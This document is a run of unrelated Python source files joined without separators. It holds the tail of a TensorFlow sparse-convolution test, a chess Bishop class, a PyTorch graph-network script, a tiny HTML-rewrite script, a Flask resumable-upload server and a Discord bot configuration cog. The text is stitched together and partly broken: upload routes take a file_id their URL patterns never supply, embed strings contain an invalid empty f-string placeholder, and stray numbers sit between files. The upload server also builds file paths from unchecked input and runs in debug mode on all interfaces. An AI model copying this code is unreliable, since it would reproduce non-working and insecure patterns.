100, (3, 3, 3), (2, 2, 2)), ) def testForward(self, BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, IMAGE_DEPTH, VIRTUAL_DEPTH, IN_CHANNELS, OUT_CHANNELS, KERNEL_SIZE, DILATIONS_SIZE): tf.random.set_seed(np.random.randint(1, tf.int64.max)) images_all = tf.random.uniform([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, VIRTUAL_DEPTH, IN_CHANNELS], dtype=tf.float32) filters = tf.random.uniform([KERNEL_SIZE[0], KERNEL_SIZE[1], KERNEL_SIZE[2], IN_CHANNELS, OUT_CHANNELS], dtype=images_all.dtype) base_plane = tf.random.uniform([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, 1], minval=0, maxval=(VIRTUAL_DEPTH - IMAGE_DEPTH), dtype=tf.int32) # base_plane = (base_plane//2)*2 # test_start_d = 5 # base_plane = tf.ones([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, 1], dtype=tf.int32) * test_start_d default_value = tf.random.uniform([], dtype=images_all.dtype) # default_value = tf.constant(0, dtype=images_all.dtype) half_kernel = np.array(KERNEL_SIZE)//2 gather_indice = base_plane + np.arange(0, IMAGE_DEPTH, dtype=np.int32)[None, None, None, :] images = tf.gather_nd(images_all, gather_indice[..., None], batch_dims=3) mask = 
tf.one_hot(gather_indice, VIRTUAL_DEPTH, on_value=True, off_value=False, dtype=tf.bool) mask = tf.reduce_any(mask, axis=-2) images_all = tf.where(mask[..., None], images_all, default_value) pad_size = np.multiply(half_kernel,np.array(DILATIONS_SIZE)) assert(len(pad_size) == 3) images_nn = tf.pad(images_all, [[0, 0], [pad_size[0], pad_size[0]], [pad_size[1], pad_size[1]], [pad_size[2], pad_size[2]], [0, 0]], mode="CONSTANT", constant_values=default_value) start = time.time() res = sparse_conv3d(images, filters, default_value, base_plane, dilations=DILATIONS_SIZE, strides=(1, 1, 1)) my_time = time.time() - start # filters_nn = tf.transpose(filters, [1, 2, 3, 4, 0]) start = time.time() res_nn = tf.nn.conv3d(images_nn, filters, strides=(1, 1, 1, 1, 1), padding="VALID", dilations=(1, *DILATIONS_SIZE, 1)) nn_time = time.time() - start gather_indice = (base_plane[:, ::1, ::1, :] + 0)//1 + np.arange(0, IMAGE_DEPTH//1, dtype=np.int32)[None, None, None, :] print(tf.shape(res_nn), tf.shape(res)) res_nn = tf.gather_nd(res_nn, gather_indice[..., None], batch_dims=3) print("my ", my_time/1000, " nn ", nn_time/1000) # test_out = tf.reduce_sum(images[:, None, :KERNEL_SIZE[0], :KERNEL_SIZE[1], :KERNEL_SIZE[2], :]*filters[None, ...], axis=(2, 3, 4, 5)) # print(test_out, base_plane[:, :KERNEL_SIZE[0], :KERNEL_SIZE[1]]) # print(res[:, half_kernel[0], half_kernel[1], half_kernel[2], :]) # print(res_nn[:, half_kernel[0], half_kernel[1], half_kernel[2], :]) self.assertShapeEqual(res.numpy(), res_nn) self.assertAllClose(res, res_nn, rtol=1e-5) sc3d = SparseConv3DLayer(3, (3, 3, 3), dtype=images.dtype) sc3d([images, base_plane]) # @parameterized.parameters( # (1, 10, 20, 3, 5, 4, 3, (3, 3, 3)), # # (2, 4, 6, 5, 8, 2, 1, (5, 3, 3)), # # (1, 128, 160, 32, 64, 4, 3, (3, 3, 3)), # # (2, 128, 160, 32, 96, 30, 20, (5, 3, 3)), # ) # def testGradTime(self, BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, IMAGE_DEPTH, VIRTUAL_DEPTH, IN_CHANNELS, OUT_CHANNELS, KERNEL_SIZE): # images_all = tf.random.uniform([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, VIRTUAL_DEPTH, IN_CHANNELS], dtype=tf.float32) # filters = tf.random.uniform([KERNEL_SIZE[0], KERNEL_SIZE[1], KERNEL_SIZE[2], IN_CHANNELS, OUT_CHANNELS], dtype=tf.float32) # base_plane = tf.random.uniform([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, 1], minval=0, maxval=(VIRTUAL_DEPTH - IMAGE_DEPTH), dtype=tf.int32) # # test_start_d = 5 # # base_plane = tf.ones([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, 1], dtype=tf.int32) * test_start_d # default_value = tf.random.uniform([], dtype=images_all.dtype) # # default_value = tf.constant(0, dtype=images_all.dtype) # half_kernel = np.array(KERNEL_SIZE)//2 # gather_indice = base_plane + np.arange(0, IMAGE_DEPTH, dtype=np.int32)[None, None, None, :] # images = tf.gather_nd(images_all, gather_indice[..., None], batch_dims=3) # mask = tf.one_hot(gather_indice, VIRTUAL_DEPTH, on_value=True, off_value=False, dtype=tf.bool) # mask = tf.reduce_any(mask, axis=-2) # images_all = tf.where(mask[..., None], images_all, default_value) # images_nn = tf.pad(images_all, [[0, 0], [half_kernel[0], half_kernel[0]], [half_kernel[1], half_kernel[1]], [half_kernel[2], half_kernel[2]], [0, 0]], # mode="CONSTANT", constant_values=default_value) # start = time.time() # with tf.GradientTape() as tape: # tape.watch([images, filters, default_value]) # res = sparse_conv3d(images, filters, default_value, base_plane) # res = tf.reduce_mean(res) # my_forward_time = time.time() - start # start = time.time() # grad = tape.gradient(res, [images, filters, default_value]) # my_backforward_time 
= time.time() - start # start = time.time() # with tf.GradientTape() as tape: # tape.watch([images, filters]) # res_nn = tf.nn.conv3d(images, filters, strides=(1, 1, 1, 1, 1), padding="SAME") # res = tf.reduce_mean(res_nn) # nn_forward_time = time.time() - start # nn_grad = tape.gradient(res, [images, filters]) # nn_backforward_time = time.time() - start # print("my forward ", my_forward_time/1000, " my backfoward ", my_backforward_time/1000, " nn forward ", nn_forward_time/1000, " nn backforward ", nn_backforward_time/1000) # self.assertShapeEqual(grad[0].numpy(), nn_grad[0]) # self.assertAllClose(grad[0], nn_grad[0]) @parameterized.parameters( (1, 10, 20, 3, 5, 4, 3, (3, 3, 3), (1, 1, 1)), (2, 4, 6, 5, 8, 2, 1, (5, 3, 3), (2, 2, 2)), ) def testGradientFloat64(self, BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, IMAGE_DEPTH, VIRTUAL_DEPTH, IN_CHANNELS, OUT_CHANNELS, KERNEL_SIZE, DILATIONS_SIZE): test_strides = (1, 1, 1) tf.random.set_seed(np.random.randint(1, tf.int64.max)) images_all = tf.random.uniform([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, VIRTUAL_DEPTH, IN_CHANNELS], dtype=tf.float32) filters = tf.random.uniform([KERNEL_SIZE[0], KERNEL_SIZE[1], KERNEL_SIZE[2], IN_CHANNELS, OUT_CHANNELS], dtype=images_all.dtype) base_plane = tf.random.uniform([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, 1], minval=0, maxval=(VIRTUAL_DEPTH - IMAGE_DEPTH), dtype=tf.int32) # test_start_d = 5 # base_plane = tf.ones([BATCH_SIZE, IMAGE_HEIGHT, IMAGE_WIDTH, 1], dtype=tf.int32) * test_start_d default_value = tf.random.uniform([], dtype=images_all.dtype) # default_value = tf.constant(0, dtype=images_all.dtype) half_kernel = np.array(KERNEL_SIZE)//2 gather_indice = base_plane + np.arange(0, IMAGE_DEPTH, dtype=np.int32)[None, None, None, :] images = tf.gather_nd(images_all, gather_indice[..., None], batch_dims=3) # mask = tf.one_hot(gather_indice, VIRTUAL_DEPTH, on_value=True, off_value=False, dtype=tf.bool) # mask = tf.reduce_any(mask, axis=-2) # images_all = tf.where(mask[..., None], images_all, default_value) # images_nn = tf.pad(images_all, [[0, 0], [half_kernel[0], half_kernel[0]], [half_kernel[1], half_kernel[1]], [half_kernel[2], half_kernel[2]], [0, 0]], # mode="CONSTANT", constant_values=default_value) cost_grad_perturbation = tf.random.uniform([BATCH_SIZE, IMAGE_HEIGHT//test_strides[0], (IMAGE_WIDTH + test_strides[1] - 1)//test_strides[1], (IMAGE_DEPTH + test_strides[2] - 1)//test_strides[2], OUT_CHANNELS], dtype=images_all.dtype) @tf.function def test_check(*args): cost = sparse_conv3d(*args, base_plane, dilations=DILATIONS_SIZE, dynamic_default=True, strides=test_strides) return tf.reduce_mean(cost*cost_grad_perturbation) with self.cached_session(): # res = sparse_conv2d(images, filters, base_plane, default_value, offsets) theoretical, numerical = gradient_checker_v2.compute_gradient(test_check, [images, filters, default_value]) # err = gradient_checker_v2.max_error(theoretical, numerical) self.assertAllClose(theoretical[0], numerical[0]) self.assertAllClose(theoretical[1], numerical[1]) self.assertAllClose(theoretical[2], numerical[2]) # self.assertAllClose(theoretical[3], numerical[3]) if __name__ == "__main__": test.main()from .piece import Piece from typing import List, Tuple class Bishop(Piece): eval_white = [[-2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0], [-1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0], [-1.0, 0.0, 5.0, 1.0, 1.0, 5.0, 0.0, -1.0], [-1.0, 5.0, 5.0, 1.0, 1.0, 5.0, 5.0, -1.0], [-1.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0, -1.0], [-1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, -1.0], [-1.0, 5.0, 0.0, 0.0, 0.0, 0.0, 
5.0, -1.0], [-2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0]] eval_black = eval_white[::-1] @staticmethod def check_laser(chessboard: List[List[str]], x: int, y: int, is_white: bool, check_mode: bool=False) -> List[Tuple[int, int]]: return Piece.get_laser((-1, -1, 1, 1, -1), chessboard, x, y, is_white, check_mode) @staticmethod def can_move(x: int, y: int, new_x: int, new_y: int, piece_in_path: bool, is_white: bool) -> bool: return abs(x-new_x) == abs(y-new_y) @staticmethod def controlled(table: List[List[bool]], chessboard: List[List[str]], x: int, y: int, is_white: bool) -> List[List[bool]]: return Piece.possible_moves((-1, -1, 1, 1, -1), table, chessboard, x, y) import argparse import torch import torch.nn.functional as F from gat_conv import GATConv from torch.nn import Linear from datasets import get_planetoid_dataset from snap_dataset import SNAPDataset from suite_sparse import SuiteSparseMatrixCollection from train_eval_cs import run import pdb from torch_geometric.nn import GCNConv from torch.nn import Parameter import os.path as osp parser = argparse.ArgumentParser() parser.add_argument('--dataset', type=str, required=True) parser.add_argument('--random_splits', type=bool, default=True) parser.add_argument('--runs', type=int, default=10) parser.add_argument('--epochs', type=int, default=200) parser.add_argument('--lr', type=float, default=0.0001) parser.add_argument('--weight_decay', type=float, default=0.0005) parser.add_argument('--early_stopping', type=int, default=10) parser.add_argument('--hidden', type=int, default=128) parser.add_argument('--dropout', type=float, default=0.5) parser.add_argument('--normalize_features', type=bool, default=True) args = parser.parse_args() class DoubleNet(torch.nn.Module): def __init__(self, dataset, num_features , num_classes): super(DoubleNet, self).__init__() self.conv1 = GCNConv(dataset.num_features, args.hidden) self.conv2 = GCNConv(args.hidden, args.hidden) self.conv1_ssl = GCNConv(dataset.num_features, args.hidden) self.conv2_ssl = GCNConv(args.hidden, int(dataset[0].num_class)) self.lin = Linear(int(dataset[0].num_class),int(dataset[0].num_class)) def reset_parameters(self): self.conv1.reset_parameters() self.conv2.reset_parameters() self.conv1_ssl.reset_parameters() self.conv2_ssl.reset_parameters() self.lin.reset_parameters() def decoder(self, z, edge_index, sigmoid=True): value = (z[edge_index[0]] * z[edge_index[1]]).sum(dim=1) return torch.sigmoid(value) if sigmoid else value def forward(self, data, pos_edge_index, neg_edge_index, edge_index, masked_nodes): x= data.x x = F.relu(self.conv1(x, edge_index)) # LAYER 1 z = self.conv2(x, edge_index) # LAYER 2 total_edge_index = torch.cat([pos_edge_index, neg_edge_index], dim=-1) pos_pred = self.decoder(z, pos_edge_index, sigmoid=True) neg_pred = self.decoder(z, neg_edge_index, sigmoid=True) total_pred = torch.cat([pos_pred, neg_pred], dim=-1) r, c = total_edge_index[0][total_pred>0.5], total_edge_index[1][total_pred>0.5] new_index = torch.stack((torch.cat([r,c], dim= -1),(torch.cat([c,r], dim= -1))), dim=0 ) added_index = torch.cat([edge_index, new_index], dim=-1) x = data.x x = F.relu(self.conv1_ssl(x, added_index)) # LAYER 1 x = self.conv2_ssl(x, added_index) # LAYER 2 # return self.lin(F.relu(x)), z,r.size() out = self.lin(F.relu(x)) drop = torch.nn.Dropout(p=0.5) return F.log_softmax(x, dim=1), z, out, r.size(-1) # ego-Facebook com-Amazon ego-gplus ego-twitter name = "ego-Facebook" path = osp.join(osp.dirname(osp.realpath(__file__)), '..', 'data', name) dataset = SNAPDataset(path, 
name) run(dataset, DoubleNet(dataset, dataset[0].num_feature, int(dataset[0].num_class)), args.runs, args.epochs, args.lr, args.weight_decay, args.early_stopping) 100-1000 #!python import fileinput for line in fileinput.input(): print(line.replace('td class="col-result', 'td class="col-result fake-button-for-vimium')) 0 from flask import Flask, render_template, request, make_response from flask_cors import CORS from datetime import datetime, timedelta import os, uuid, base64 # metadata -> dict def metadata2dict(metadata): data = {} for field in metadata.split(','): values = field.split(' ') data[values[0]] = base64.b64decode(values[1]).decode('utf-8') if len(values) > 1 else '' return data # get saved file size ## return false if not exists def get_saved_file_size(file_id): path = f'./static/uploaded/{file_id}' if not os.path.exists(path): return False return os.path.getsize(path) # save file, resumable def save_file(file_id, content): path = f'./static/uploaded/{file_id}' # staticディレクトリに配置してダウンロードできるようにする if not os.path.isdir('./static/uploaded'): os.mkdir('./static/uploaded') with open(path, 'ab' if os.path.isfile(path) else 'wb') as f: f.write(content) # 保存済みサイズを返す return get_saved_file_size(file_id) # --- # ベースURLのルーティング関数 ## ベースURL: uWSGI環境変数から読み込みfile_id url_for = lambda url: request.environ.get('ROOT_URL', 'http://192.168.11.237:3333/') + url app = Flask(__name__) CORS(app) # url_for関数を上書き app.jinja_env.globals.update(url_for = url_for) files = {} # uploading files # home @app.route('/', methods=['GET']) def home(): return render_template('home.jinja') # create file upload @app.route('/api/files/', methods=['POST']) def upload(): data = { 'content_length': request.headers.get('Content-Length'), 'upload_length': request.headers.get('Upload-Length'), 'tus_resumable': request.headers.get('Tus-Resumable'), 'upload_metadata': metadata2dict(request.headers.get('Upload-Metadata')), 'id': str(uuid.uuid4()) # 任意のファイルID生成 } if data['upload_metadata']['fileext'] != '': # 拡張子がある場合は付与する data['id'] += '.' 
+ data['upload_metadata']['fileext'] res = make_response('', 201) res.headers['Location'] = '/api/files/' + data['id'] res.headers['Tus-Resumable'] = data['tus_resumable'] #res.headers['Access-Control-Allow-Origin'] = request.environ['HTTP_ORIGIN'] #res.headers['Access-Control-Allow-Headers'] = 'access-control-allow-origin,content-type' res.headers['Access-Control-Expose-Headers'] = 'Upload-Offset, Location, Upload-Length, Tus-Version, Tus-Resumable, Tus-Max-Size, Tus-Extension, Upload-Metadata' files[data['id']] = int(data['upload_length']) # アップロード予定サイズを保持 return res # resume file upload @app.route('/api/files/', methods=['PATCH']) def resume(file_id): data = { 'content_type': request.headers.get('Content-Type'), 'content_length': request.headers.get('Content-Length'), # 残りアップロードサイズ 'upload_offset': request.headers.get('Upload-Offset'), # アップロード済みサイズ 'tus_resumable': request.headers.get('Tus-Resumable') } # ファイル保存 saved_size = save_file(file_id, request.get_data()) # response res = make_response('', 204) res.headers['Upload-Expires'] = datetime.now() + timedelta(hours=1) # レジューム不可になる期限=1時間後 res.headers['Upload-Offset'] = 0 if saved_size == False else saved_size # アップロード済みサイズ res.headers['Tus-Resumable'] = data['tus_resumable'] #res.headers['Access-Control-Allow-Origin'] = request.environ['HTTP_ORIGIN'] #res.headers['Access-Control-Allow-Headers'] = 'access-control-allow-origin,content-type' res.headers['Access-Control-Expose-Headers'] = 'Upload-Offset, Location, Upload-Length, Tus-Version, Tus-Resumable, Tus-Max-Size, Tus-Extension, Upload-Metadata' return res # confirm uploaded file @app.route('/api/files/', methods=['HEAD']) def confirm(file_id): # response saved_size = get_saved_file_size(file_id) # アップロード済みサイズ res = make_response('', 404 if saved_size == False else 200) if isinstance(saved_size, int): res.headers['Upload-Offset'] = saved_size res.headers['Tus-Resumable'] = request.headers.get('Tus-Resumable') return res if __name__ == "__main__": # run server: http://localhost:3333 app.run(port=3333, debug=True, host="0.0.0.0") src/cogs/config.py import os import sys import time import psutil import aiohttp import discord import logging import humanize import datetime import coloredlogs from discord.utils import get from discord.ext import commands from collections import Counter from utils.GuildConfigManager import GuildConfigManager from utils.TimeConverter import TimeConverter async def webhook_send( url, message, username="Erin Logs", avatar="https://raw.githubusercontent.com/AakashSharma7269/erin/main/erin.png?token=", ): async with aiohttp.ClientSession() as session: webhook = discord.Webhook.from_url( url, adapter=discord.AsyncWebhookAdapter(session) ) if isinstance(message, discord.Embed): await webhook.send(embed=message, username=username, avatar_url=avatar) else: await webhook.send(message, username=username, avatar_url=avatar) log = logging.getLogger("Utility cog") coloredlogs.install(logger=log) allowed_ords = ( list(range(65, 91)) + list(range(97, 123)) + [32, 33, 35, 36, 37, 38, 42, 43, 45, 46, 47] + list(range(48, 65)) + list(range(90, 97)) ) class plural: def __init__(self, value): self.value = value def __format__(self, format_spec): if self.value == 1: return f"{self.value} {format_spec}" else: return f"{self.value} {format_spec}s" class Config(commands.Cog): """ Configuration commands for the server admins! 
""" def __init__(self, bot): self.bot = bot self.TimeConverter = TimeConverter() self.gcm = GuildConfigManager() @commands.Cog.listener() async def on_ready(self): log.warn(f"{self.__class__.__name__} Cog has been loaded") # on guild add , add a default prefix @commands.Cog.listener() async def on_guild_join(self, guild): await self.gcm.register_guild(guild) channelEmbed = discord.Embed( name="Erin added!", description=f"Erin was added to `{guild.name}`", color=11661816, ) channelEmbed.add_field(name="Guild ID:", value=guild.id, inline=False) channelEmbed.add_field(name="Guild owner id:", value=guild.owner.id, inline=False) channelEmbed.add_field(name="Guild owner:", value=f"<@{}> , {guild.owner}", inline=False) channelEmbed.set_thumbnail(url=guild.icon_url) channelEmbed.set_footer( text=guild.name, icon_url=guild.icon_url, ) channelEmbed.set_author( name=self.bot.user.display_name, icon_url=self.bot.user.avatar_url ) await webhook_send( os.getenv("GUILDADDLOG"), message=channelEmbed, username="Erin join logs" ) # on guild remove, remove all the prefixes from the database @commands.Cog.listener() async def on_guild_remove(self, guild): await self.gcm.unregister_guild(guild) print("Erin removed!") channelEmbed = discord.Embed( name="Erin removed :c", description=f"Erin was removed from `{guild.name}`", color=11661816, ) channelEmbed.add_field(name="Guild ID:", value=guild.id, inline=False) channelEmbed.add_field(name="Guild owner id:", value=guild.owner.id, inline=False) channelEmbed.add_field(name="Guild owner:", value=f"<@{}> , {guild.owner}", inline=False) channelEmbed.set_thumbnail(url=guild.icon_url) channelEmbed.set_footer( text=guild.name, icon_url=guild.icon_url, ) channelEmbed.set_author( name=self.bot.user.display_name, icon_url=self.bot.user.avatar_url ) await webhook_send( os.getenv("GUILDREMOVELOG"), message=channelEmbed, username="Erin leave logs" ) # prefix manager sub command @commands.group(name="prefix", aliases=["setprefix"], case_insensitive=True, description="Sets my prefix!") @commands.cooldown(10, 120, commands.BucketType.guild) @commands.has_permissions(manage_guild=True) async def prefix(self, ctx): if ctx.invoked_subcommand is None: await ctx.message.reply( "Please mention a proper argument such as `add`, `remove`, or `list`" ) @prefix.command() @commands.has_permissions(manage_guild=True) async def add(self, ctx, *, prefix: str = None): prefixes = await self.gcm.get_prefix(ctx.guild) embed = discord.Embed( color=ctx.message.author.color, timestamp=ctx.message.created_at ) embed.set_footer( text=ctx.message.author.display_name, icon_url=ctx.message.author.avatar_url ) embed.set_author( name=self.bot.user.display_name, icon_url=self.bot.user.avatar_url ) if not prefix: embed.title = "Current prefix list" prefixNames = "".join([f"`{prefix}`\n" for prefix in prefixes]) embed.description = prefixNames embed.set_thumbnail(url=ctx.message.author.avatar_url) return await ctx.message.reply( "Please mention a valid prefix to be set.", embed=embed ) for character in prefix: if ord(character) not in allowed_ords: return await ctx.message.reply( f"The character `{character}` in this prefix is not permitted" ) if len(prefixes) >= 3: return await ctx.message.reply( f"Unable to add `{prefix}` as a custom prefix. 
Guild has reached the max amount (3) of custom prefixes.\nRun `{ctx.prefix}prefix remove ` to free up a slot" ) if prefix in prefixes: return await ctx.message.reply(f"Prefix `{prefix}` already exists.") if len(prefix) > 2: return await ctx.message.reply("Please enter a valid 2 character prefix.") for item in prefixes: if prefix in item or item in prefix: return await ctx.message.reply( f"`{prefix}` is technically present in `{item}`. Remove `{item}` before proceeding to add `{prefix}`" ) added = await self.gcm.add_prefix(ctx.guild, prefix) if added: embed.title = "Prefix added" embed.description = f"`{prefix}` added to guild prefix list" else: embed.title = "Prefix not added" embed.description = f"`{prefix}` was alerady in the prefix list" return await ctx.message.reply(embed=embed) @prefix.command() @commands.has_permissions(manage_guild=True) async def remove(self, ctx, *, prefix: str = ""): prefixes = await self.gcm.get_prefix(ctx.guild) embed = discord.Embed( color=ctx.message.author.color, timestamp=ctx.message.created_at ) embed.set_footer( text=ctx.message.author.display_name, icon_url=ctx.message.author.avatar_url ) embed.set_author( name=self.bot.user.display_name, icon_url=self.bot.user.avatar_url ) if len(prefixes) < 2: return await ctx.message.reply( "Guild must have atleast 1 prefix, add another one before removing any." ) if len(prefix) == 0: return await ctx.message.reply("Please provide a valid prefix to remove.") if not (prefix in prefixes): return await ctx.message.reply( f"`{prefix}` is not a custom prefix in `{ctx.message.guild.name}`" ) removed = await self.gcm.remove_prefix(ctx.guild, prefix) if removed: embed.title = "Prefix removed" embed.description = f"`{prefix}` removed from guild prefix list" else: embed.title = "Prefix not removed" embed.description = f"`{prefix}` was already in the guild prefix list" return await ctx.message.reply(embed=embed) @prefix.command() @commands.cooldown(10, 120, commands.BucketType.guild) async def list(self, ctx): prefixes = await self.gcm.get_prefix(ctx.guild) embed = discord.Embed( color=ctx.message.author.color, timestamp=ctx.message.created_at ) embed.set_footer( text=ctx.message.author.display_name, icon_url=ctx.message.author.avatar_url ) embed.set_author( name=self.bot.user.display_name, icon_url=self.bot.user.avatar_url ) embed.title = "Current prefix list" prefixNames = "".join([f"`{prefix}`\n" for prefix in prefixes]) embed.description = prefixNames embed.set_thumbnail(url=ctx.message.author.avatar_url) return await ctx.message.reply(embed=embed) @commands.group(name="prefixes", aliases=["getprefix", "getprefixes"], case_insensitive=True, description="Gets my prefix!") @commands.cooldown(10, 120, commands.BucketType.guild) async def prefixes(self, ctx): prefixes = await self.gcm.get_prefix(ctx.guild) embed = discord.Embed( color=ctx.message.author.color, timestamp=ctx.message.created_at ) embed.set_footer( text=ctx.message.author.display_name, icon_url=ctx.message.author.avatar_url ) embed.set_author( name=self.bot.user.display_name, icon_url=self.bot.user.avatar_url ) embed.title = "Current prefix list" prefixNames = "".join([f"`{prefix}`\n" for prefix in prefixes]) embed.description = prefixNames embed.set_thumbnail(url=ctx.message.author.avatar_url) return await ctx.message.reply(embed=embed) @commands.group(name="muterole", case_insensitive=True, description="Sets up a `Muted` role!") @commands.cooldown(10, 120, commands.BucketType.guild) @commands.has_permissions(manage_guild=True) async def muterole(self, ctx): if 
ctx.invoked_subcommand is None: await ctx.message.reply( "please mention a proper argument such as `add`, `remove` or `show`" ) @muterole.command(name="add") @commands.has_permissions(manage_guild=True) async def _add(self, ctx, muted_role: discord.Role): bot = ctx.guild.get_member(self.bot.user.id) # if the muted role is @everyone then throw badargument error if muted_role.id == ctx.guild.id: raise commands.errors.BadArgument( message='Role "@everyone" not found.') if muted_role.managed == True: raise commands.errors.BadArgument( message=f"{muted_role.mention} is managed by discord integration and cannot be added to anyone by me." ) if muted_role.position > bot.top_role.position: return await ctx.send( "I cannot assign the role to mute members as it is above my highest role." ) add = await self.gcm.add_muted_role(ctx.guild, muted_role.id) if add: return await ctx.message.reply(f"Mute role for `{ctx.guild.name}` updated.") @muterole.command(name="remove") @commands.has_permissions(manage_guild=True) async def _remove(self, ctx): try: await self.gcm.remove_muted_role(ctx.guild) except KeyError: return await ctx.message.reply( f"Muted role doesn't exist for `{ctx.guild.name}`" ) return await ctx.message.reply(f"Mute role for `{ctx.guild.name}` removed.") @muterole.command(name="show") async def _show(self, ctx): try: muted_role_id = await self.gcm.get_muted_role(ctx.guild) except KeyError: return await ctx.message.reply( f"No mute role has been setup for {ctx.guild.name}" ) muted_role = get(ctx.message.guild.roles, id=muted_role_id) embed = discord.Embed( title=f"{ctx.guild.name} - muted role is:", description=f"{muted_role.mention}", timestamp=ctx.message.created_at, color=ctx.message.author.color, ) return await ctx.message.reply(embed=embed) @commands.group(name="muteduration", case_insensitive=True, description="Sets up a `Muted` role!") @commands.cooldown(10, 120, commands.BucketType.guild) @commands.has_permissions(manage_guild=True) async def muteduration(self, ctx): if ctx.invoked_subcommand is None: await ctx.message.reply( "please mention a proper argument such as `set` or `show`" ) @muteduration.command(name="set") @commands.has_permissions(manage_guild=True) async def muteduration_set(self, ctx,mute_period:str=None): _mute_period = await self.TimeConverter.convert(ctx, mute_period) _mute_period_time = humanize.precisedelta(_mute_period) await self.gcm.set_default_mutetime(ctx.guild,_mute_period) embed = discord.Embed( title=f"{ctx.guild.name} - Default mute duration has been set to:", description=f"{_mute_period_time}", timestamp=ctx.message.created_at, color=ctx.message.author.color, ) return await ctx.send(embed=embed) @muteduration.command(name="show") async def muteduration_show(self, ctx): try: muteduration = await self.gcm.get_default_mutetime(ctx.guild) except KeyError: await self.gcm.set_default_mutetime(ctx.guild) return await ctx.message.reply( f"A default mute duration has not been setup for {ctx.guild.name}. Setting default mute duration to 1 hour." 
) embed = discord.Embed( title=f"{ctx.guild.name} - Default mute duration is:", description=f"{humanize.precisedelta(muteduration)}", timestamp=ctx.message.created_at, color=ctx.message.author.color, ) return await ctx.message.reply(embed=embed) @commands.group(name="banappeal", case_insensitive=True, description="Sets the ban appeal link") @commands.cooldown(10, 120, commands.BucketType.guild) @commands.has_permissions(manage_guild=True) async def banappeal(self, ctx): if ctx.invoked_subcommand is None: await ctx.message.reply( "please mention a proper argument such as `add`, `remove` or `show`" ) @banappeal.command(name="add") @commands.has_permissions(manage_guild=True) async def __add(self, ctx, *, url: str): ban_appeal = await self.gcm.add_ban_appeal(ctx.guild, url) if ban_appeal: return await ctx.message.reply( f"Ban appeal link for `{ctx.guild.name}` updated." ) @banappeal.command(name="remove") @commands.has_permissions(manage_guild=True) async def __remove(self, ctx): try: await self.gcm.remove_ban_appeal(ctx.guild) except KeyError: return await ctx.message.reply( f"Ban appeal link doesn't exist for `{ctx.guild.name}`" ) return await ctx.message.reply( f"Ban appeal link for `{ctx.guild.name}` removed." ) @banappeal.command(name="show") async def __show(self, ctx): try: ban_appeal = await self.gcm.get_ban_appeal(ctx.guild) except KeyError: return await ctx.message.reply( f"No ban appeal link has been setup for {ctx.guild.name}" ) embed = discord.Embed( title=f"{ctx.guild.name} - Ban appeal link:", description=f"{ban_appeal}", timestamp=ctx.message.created_at, color=ctx.message.author.color, ) return await ctx.message.reply(embed=embed) @commands.group(name="currencygen", case_insensitive=True, description="Sets the `drop/pick` channel") @commands.cooldown(10, 120, commands.BucketType.guild) @commands.has_permissions(manage_guild=True) async def currencygen(self, ctx): if ctx.invoked_subcommand is None: await ctx.message.reply( "please mention a proper argument such as `add`, `remove` or `show`" ) @currencygen.command(name="add") @commands.has_permissions(manage_guild=True) async def ___add(self, ctx, *, channel: discord.TextChannel): currencyChannel = await self.gcm.update_currency_channel(ctx.guild, channel.id) if currencyChannel: return await ctx.message.reply( f"Currency generation channel for `{ctx.guild.name}` has been updated." ) @currencygen.command(name="remove") @commands.has_permissions(manage_guild=True) async def ___remove(self, ctx): try: await self.gcm.remove_currency_channel(ctx.guild) except KeyError: return await ctx.message.reply( f"Currency generation channel config doesn't exist for `{ctx.guild.name}`" ) return await ctx.message.reply( f"Currency generation channel for `{ctx.guild.name}` removed." 
) @currencygen.command(name="show") async def ___show(self, ctx): try: currencyChannel = await self.gcm.get_currency_channel(ctx.guild) except KeyError: return await ctx.message.reply( f"No currency generation channel has been setup for {ctx.guild.name}" ) if not ctx.guild.get_channel(currencyChannel): return await ctx.message.reply( f"No currency generation channel has been setup for {ctx.guild.name}" ) embed = discord.Embed( title=f"{ctx.guild.name} - Currency generation channel:", description=f"{ctx.guild.get_channel(currencyChannel).mention}", timestamp=ctx.message.created_at, color=ctx.message.author.color, ) return await ctx.message.reply(embed=embed) @commands.cooldown(1, 3, commands.BucketType.user) @commands.group(name="ping", description="Shows you my ping!") async def ping(self, ctx): time_now = time.time() msg = await ctx.message.reply( embed=discord.Embed(title="Pinging...", color=0x00FFFF) ) embed = discord.Embed( title="Pong! :ping_pong:", description=f"API Latency: **{round(self.bot.latency * 1000)}ms**\nBot Latency: **{round((time.time() - time_now) * 1000)}ms**", color=0x00FFFF, ) embed.set_footer( text=f"{ctx.message.author.display_name}#{ctx.message.author.discriminator}", icon_url=ctx.message.author.avatar_url, ) embed.set_author( name=self.bot.user.display_name, icon_url=self.bot.user.avatar_url ) await msg.edit(embed=embed) @commands.command(name="stats", aliases=["status"], description="View system stats") async def stats(self, ctx): mem = psutil.virtual_memory() disk = psutil.disk_usage("/") cpupercent = psutil.cpu_percent() async def round(n): if not n == 100: a = (n // 10) * 10 b = a + 10 return (b if n - a > b - n else a) else: return 100 async def make_bar(n): full = '█' empty = '░' bar = "" for i in range(1, (int(n/10)+1)): bar = bar+full for i in range(1, ((10-(int(n/10)))+1)): bar = bar+empty return bar membar = await round(int(mem.percent)) membar = await make_bar(membar) cpubar = await round(int(cpupercent)) cpubar = await make_bar(cpubar) diskbar = await round(int(disk.percent)) diskbar = await make_bar(diskbar) channel_types = Counter( isinstance(c, discord.TextChannel) for c in self.bot.get_all_channels() ) text = channel_types[True] em = discord.Embed(title="Bot Stats", color=discord.Color.blurple()) em.add_field( name="General info:", inline=False, value=f"Total Guilds: **{len(list(self.bot.guilds))}**\nTotal Users: 